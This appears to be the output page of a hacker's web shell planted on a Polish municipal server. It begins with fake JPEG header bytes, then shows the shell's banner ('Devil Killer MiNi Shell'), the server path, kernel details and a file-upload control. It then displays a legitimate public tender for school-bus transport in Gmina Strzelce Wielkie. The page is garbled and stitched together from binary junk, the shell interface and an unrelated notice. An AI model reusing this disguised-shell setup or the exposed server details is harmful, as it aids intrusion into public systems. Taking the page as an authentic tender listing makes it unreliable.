JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250806/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250806/0036439801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przewóz uczniów do szkół podstawowych i przedszkoli mających swoją siedzibę <br/>w Gminie Strzelce Wielkie w roku szkolnym 2025/2026 na podstawie biletów miesięcznych wystawionych przez Wykonawcę </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRZELCE WIELKIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398646</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Częstochowska 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Wielkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-337</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@strzelce-wielkie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strzelce-wielkie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przewóz uczniów do szkół podstawowych i przedszkoli mających swoją siedzibę <br/>w Gminie Strzelce Wielkie w roku szkolnym 2025/2026 na podstawie biletów miesięcznych wystawionych przez Wykonawcę </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a1a0b484-06a4-4a1e-bde1-ed2ea4120542</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00364398</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/strzelce_wielkie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/strzelce_wielkie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje ogólne<br/>8.1.1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, <br/>a wykonawcami odbywa się przy użyciu www.platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/strzelce_wielkie<br/>8.1.2.	Zamawiający wyznacza następującą osobę do kontaktu z wykonawcami:<br/>Jolanta Sobera – Kierownik Referatu Inwestycji, Zamówień Publicznych, Pozyskiwania Środków Zewnętrznych i Promocji.<br/> email: zamowienia-publiczne@strzelce-wielkie.pl<br/>8.1.3.	Komunikacja między zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. <br/>8.1.4.	Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego. Zamawiający dopuszcza, awaryjnie, komunikację za pośrednictwem poczty elektronicznej. <br/>8.1.5.	Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>8.1.6.	Zamawiający zgodnie z Rozporządzeniem Prezesa Rady Ministrów określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f)	Platformazakupowa.pl działa według standardu przyjętego <br/>w komunikacji sieciowej - kodowanie UTF8,<br/>g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>8.1.7.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a)	akceptuje warunki korzystania z platformazakupowa.pl określone <br/>w Regulaminie zamieszczonym na stronie internetowej w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków <br/>8.1.8.	Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/strzelce_wielkie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Gmina Strzelce Wielkie reprezentowana przez Wójta Gminy Strzelce Wielkie<br/>Dane tele-adresowe Zamawiającego:<br/>Gmina Strzelce Wielkie<br/>98-337 Strzelce Wielkie ul. Częstochowska 14<br/>Adres e-mail: zamowienia-publiczne@strzelce-wielkie.pl <br/>Tel. (34) 311-07-78<br/>	w Gminie Strzelce Wielkie wyznaczony został Inspektor Ochrony Danych, kontakt:<br/>kontakt@odoonline.pl, telefon 791 650 517<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie podstawowym bez negocjacji pn.: Przewóz uczniów do szkół podstawowych i przedszkoli mających swoją siedzibę w Gminie Strzelce Wielkie w roku szkolnym 2025/2026 na podstawie biletów miesięcznych wystawionych przez Wykonawcę Znak sprawy: ZPI.271.7.2025<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i 74 Pzp<br/>	Pani/Pana dane osobowe będą przechowywane oraz archiwizowane przez okres wynikający z obowiązujących przepisów prawa, w szczególności Pzp, rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych, w tym przez okres niezbędny do dochodzenia roszczeń;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>	Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPI.271.7.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 218900,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przewóz uczniów do szkół podstawowych i przedszkoli mających swoją siedzibę w Gminie Strzelce Wielkie w roku szkolnym 2025/2026 na podstawie biletów miesięcznych wystawionych przez Wykonawcę.<br/>Przewóz dotyczy dowiezienia dzieci i uczniów na zajęcia przedszkolne i szkolne i odwiezienie tychże osób po zajęciach szkolnych według ustalonego rozkładu dostosowanego do zajęć lekcyjnych.<br/><br/>Zadanie 1 – autobus nr 1<br/>Trasa 1: dowóz uczniów na trasie obejmującej miejscowości: <br/>Górki - Zamoście-Kolonia - Dębowiec Wielki - Dębowiec Mały - Zamoście -Wiewiec (szkoła) – Zamoście-Kolonia (szkoła) - Strzelce Wielkie (szkoła) <br/><br/>Trasa 2: dowóz uczniów na trasie obejmującej miejscowości: <br/>Strzelce Wielkie, ul. Adamów - Strzelce Wielkie, ul. Michałów - Strzelce Wielkie (szkoła)<br/>Trasa 3: dowóz uczniów na trasie obejmującej miejscowości: <br/>Skąpa - Antonina - Strzelce Wielkie (szkoła) <br/><br/>Trasa 4: odwóz uczniów na trasie obejmującej miejscowości:<br/>Wistka – Marzęcice<br/><br/>Trasa 5: odwóz uczniów na trasie obejmującej miejscowości:<br/>Zamoście Kolonia (szkoła) – Wiewiec (szkoła) – Dębowiec Mały – Dębowiec Wielki – Górki <br/><br/>Trasa 6: odwóz uczniów na trasie obejmującej miejscowości:<br/>Strzelce Wielkie ul. Andrzejów - Wola Jankowska - Strzelce Wielkie ul. Adamów - Strzelce Wielkie ul. Michałów <br/><br/>Trasa 7: odwóz uczniów na trasie obejmującej miejscowości:<br/>Skąpa - Antonina (Ostrołęka - Dworszowice) <br/>Trasa 8: odwóz uczniów na trasie obejmującej miejscowości:<br/>Strzelce Wielkie ul. Andrzejów - Wola Jankowska - Strzelce Wielkie ul. Adamów - Strzelce Wielkie ul. Michałów <br/>Trasa 9: odwóz uczniów na trasie obejmującej miejscowości:<br/>Zamoście Kolonia (szkoła) – Wiewiec (szkoła) – Dębowiec Mały – Dębowiec Wielki – Górki<br/>Zadanie 2 – autobus nr 2<br/>Trasa 10: dowóz uczniów na trasie obejmującej miejscowości: <br/>Zamoście – Zamoście-Kolonia - Pomiary - Wola Wiewiecka – Wola Wiewiecka (Praca) – Kontrewers – Wiewiec (pod lasem) – Wiewiec (szkoła) – Strzelce Wielkie (szkoła)<br/><br/>Trasa 11: dowóz uczniów na trasie obejmującej miejscowości: <br/>Marzęcice - Wola Jankowska – Strzelce Wielkie, ul. Andrzejów - Strzelce Wielkie (szkoła)<br/><br/>Trasa 12: dowóz uczniów na trasie obejmującej miejscowości:<br/>Wistka - Strzelce Wielkie (szkoła)<br/><br/>Trasa 13: odwóz uczniów na trasie obejmującej miejscowości:<br/>Strzelce Wielkie (szkoła) - Zamoście - Zamoście-Kolonia (szkoła) - Pomiary - Wiewiec (szkoła) - Kontrewers - Wola Wiewiecka - Praca - Strzelce Wielkie<br/><br/>Trasa 14: odwóz uczniów na trasie obejmującej miejscowości:<br/>Marzęcice - Wistka <br/>Trasa 15: odwóz uczniów na trasie obejmującej miejscowości:<br/>Marzęcice - Wistka <br/>Trasa 16: odwóz uczniów na trasie obejmującej miejscowości:<br/>Strzelce Wielkie (szkoła) - Zamoście - Zamoście-Kolonia (szkoła) - Pomiary - Wiewiec (szkoła) - Kontrewers - Wola Wiewiecka - Praca - Strzelce Wielkie<br/><br/>3.3.	Przewóz uczniów wykonywany będzie pojazdami dostosowanymi do ilości uczniów na danej trasie. Dowóz uczniów realizowany będzie w okresie od 01 września 2025 roku do 26 czerwca 2026 roku w dni nauki szkolnej.<br/>3.4.	Liczba uczniów i dzieci objętych przewozem na poszczególnych trasach ze wskazaniem placówki oświatowej została przedstawiona w załączniku nr 1A do SWZ. <br/>3.5.	Zamawiający wymaga, aby godziny dowozu i odwozu uczniów były dostosowane do rozkładu zajęć szkolnych ze wskazaniem, aby przewóz odbywał się w następujących godzinach: <br/><br/>a)	Szkoła Podstawowa w Wiewcu:<br/>Dowóz: nie później niż na godzinę 7:40 rano. <br/>Odwóz: <br/>Kurs 1 o godz. 13:20 dzieci klas – p-le, I-III, kierunek Wola Wiewiecka (autobus nr 2);<br/>Kurs 2 o godz. 14:00 dzieci klas – p-le, I-III, kierunek Dębowiec Mały (autobus nr 1);<br/>Kurs 3 o godz. 15:20 pozostali uczniowie, kierunek Wola Wiewiecka (autobus nr 2);<br/>Kurs 4 o godz. 15:40 pozostali uczniowie, kierunek Dębowiec Mały (autobus nr 1).<br/><br/>b)	Szkoła Filialna Szkoły Podstawowej w Wiewcu w Zamościu-Kolonii:<br/>Dowóz: nie później niż na godzinę 7:55 rano;<br/>Odwóz: Kurs 1 o godz. 13:50, dzieci klas – p-le, I-III (autobus nr 1);<br/>Kurs 2 15:35, pozostali uczniowie, (autobus nr 1); <br/>c)	Zespół Szkolno-Przedszkolny w Strzelcach Wielkich:<br/>Dowóz: nie później niż na godzinę 8:10 rano;<br/>Kurs 1 o godz. 13:00 dzieci klas – p-le, I-III, kierunek Wistka (autobus nr 1);<br/>Kurs 2 o godz. 13:10 dzieci klas – p-le, I-III, kierunek Wiewiec (autobus nr 2);<br/>Kurs 3 o godz. 13:45 dzieci klas – p-le, I-III, kierunek Zamoście-Kolonia – Wiewiec (autobus nr 1);<br/>Kurs 4 o godz. 14:10 dzieci klas – p-le, I-III, kierunek Wistka (autobus nr 2); <br/>Kurs 5 o godz. 14:30 dzieci klas – p-le, I-III, kierunek Wola Jankowska (autobus nr 1);<br/>Kurs 6 o godz. 14:45 dzieci klas – pozostali uczniowie, kierunek Wistka (autobus nr 2);<br/>Kurs 7 o godz. 15:00 dzieci klas – wszyscy uczniowie, kierunek Skąpa (autobus nr 1);<br/>Kurs 8 o godz. 15:10 dzieci klas – pozostali uczniowie, kierunek Wiewiec (autobus nr 2);<br/>Kurs 9 o godz. 15:15 dzieci klas – pozostali uczniowie, kierunek Wola Jankowska (autobus nr 1);<br/>Kurs 10 o godz. 15:30 dzieci klas – pozostali uczniowie, kierunek Wiewiec (autobus nr 1).<br/>3.6	Opiekę podczas dowożenia na podstawie art. 32 ust. 7 oraz art. 39 ust. 3 pkt 1 ustawy z dnia 14 grudnia 2016 r. Prawo oświatowe ( Dz. U. z 2021 r. poz. 1082 ze zm.) zapewni Zamawiający. Wykonawca dla osób sprawujących opiekę nad dziećmi w trakcie dowozu zastosuje 100 % ulgę w cenie biletu miesięcznego. <br/>3.7 Łączna dzienna długość tras przejazdu autokarów wynosi około 330 km. <br/>3.8 Szczegółowy wykaz tras dowozu uczniów stanowi załącznik nr 9 do SWZ.<br/>3.9 Prognozowana łączna ilość uczniów objętych dowozem wynosi 199 uczniów, dla takiej liczby uczniów Zamawiający dokona zakupu imiennych biletów miesięcznych.<br/>6) Podane liczby uczniów są liczbami aktualnymi na dzień ogłoszenia o zamówieniu i mogą ulec zmianie w trakcie okresu wykonywania umowy. Zmiana liczby dowożonych uczniów nie wymaga aneksu do umowy. Zamawiający informuje, że zmiana liczby uczniów nie przekroczy wartości ± 20%.<br/>3.10 Zamawiający zobowiązuje się do przedstawienia Wykonawcy przed rozpoczęciem świadczenia usługi imiennych list uczniów dowożonych na poszczególnych trasach do końca miesiąca sierpnia 2025 roku w celu wystawienia biletów miesięcznych, a także do aktualizowania tychże list w przypadku zmiany liczby uczniów na koniec każdego miesiąca kalendarzowego objętego okresem świadczenia usługi. Dane osobowe uczniów dla których będą zakupywane bilety miesięczne na danej trasie będą przekazywane Wykonawcy na podstawie umowy o powierzeniu danych. <br/>3.11 Wykonawca do 20 dnia każdego miesiąca świadczenia usług dostarczy Usługobiorcy wydrukowane imienne miesięczne bilety na następny miesiąc kalendarzowy wraz z fakturą VAT. <br/>3.12 Wykonawca jest zobowiązany do zapewnienia dowozu wszystkich uczniów do szkół nie późnej niż przed godziną 7:55 rano, lecz nie wcześniej niż na godz. 7.20. Wykonawca powinien dostosować czas i trasy przejazdu do liczby przewożonych dzieci.<br/>3.13 Zamawiający zastrzega sobie prawo kontroli w trakcie realizacji umowy sposobu realizacji przewozów: przede wszystkim do kontroli terminowości i punktualności przejazdów, a także prawo do sprawdzania dokumentów, związanych z wykonywaniem umowy, w tym oczywiście także wymaganych pozwoleń.<br/>3.14 Wykonawca jest zobowiązany do dowiezienia uczniów przed rozpoczęciem zajęć szkolnych i ich odwiezienia po zakończonych zajęciach szkolnych w godzinach określonych przez Zamawiającego. W przypadku awarii pojazdu dowożącego uczniów Wykonawca zobowiązany jest niezwłocznie do zapewnienia we własnym zakresie pojazdu zastępczego, tak by dowóz i odwóz uczniów odbywał się prawidłowo. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34980000-0 - Bilety przewozowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-09-01 do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Zamawiający dokona wyboru oferty najkorzystniejszej spośród ofert nie podlegających odrzuconych na podstawie art. 226 Pzp. <br/>17.2.	Przy wyborze oferty najkorzystniejszej Zamawiający będzie się kierował następującymi kryteriami:<br/>1)	cena oferty (C) – 100%<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt<br/>17.3.	Punkty za kryterium „Cena” zostaną obliczone wg wzoru:<br/>Liczba Cn<br/>zdobytych (C) = ----------- x 10 <br/>punktów Cb<br/>gdzie:<br/>C – ilość punktów za kryterium cena<br/>Cn – cena najniższa wśród ofert nie odrzuconych<br/>Cb – cena oferty badanej<br/>17.4.	W ofercie, o której mowa w pkt 17.5., Wykonawca ma obowiązek:<br/>1)	poinformowania zamawiającego, że wybór jego oferty będzie prowadził do <br/> powstania u 